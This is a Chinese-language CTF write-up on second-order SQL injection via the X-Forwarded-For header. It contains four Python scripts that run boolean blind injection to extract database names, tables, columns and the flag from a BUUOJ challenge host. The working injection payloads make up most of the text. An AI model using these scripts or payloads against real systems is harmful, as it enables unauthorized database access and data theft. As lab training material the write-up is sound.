CTF--二次注入

二次注入

昨天的博客没写完，今天补充一下发出去

<!-- Debug Info: 
 Duration: 0.59636402130127 s 
 Current Ip: 10.244.80.46  -->

一看到current IP和last IP，就要知道，应该是把我们的IP写刀数据库里了
这样的话 就是修改X-FORWARD-FOR的值进行注入

先输入1，此时我们的current ip就是它，然后我们再次输入currnt ip是2，但是last IP就是1，因为第一次和第二次的IP不一样，所以服务器并不会从数据库找last IP，它会把上次的IP=1直接显示为last IP，然后存入数据库，我们再传一次2，因为和currnet IP相同，那么last IP就会从数据库里寻找，但是也从1里面找了，假如1是一个命令，也就跟着执行了。

爆数据库：

import requests

url = "http://node4.buuoj.cn:25894/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = "0' or ascii(substr((select group_concat(schema_name) from information_schema.schemata),{0},1))>{1} or '0".format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

表

import requests

url = "http://node4.buuoj.cn:25894/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

字段

import requests

url = "http://node4.buuoj.cn:25894/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

flag

import requests

url = "http://node4.buuoj.cn:25894/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select F4l9_C01uMn from F4l9_D4t4B45e.F4l9_t4b1e limit 1,1),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l<r):
		head["X-Forwarded-For"] = urls.format(i,mid)
		html_0 = requests.post(url,headers = head)
		head["X-Forwarded-For"] = urls.format(i, mid+1)
		html_0 = requests.post(url, headers=head)
		html_0 = requests.post(url, headers=head)
		if "Last Ip: 1" in html_0.text:
			l= mid+1
		else:
			r=mid
		mid = (l+r)>>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

总结一下，开始我还以为是一个ssrf，到后来发现不对劲，原来是一个注入题，也是经验不足吧。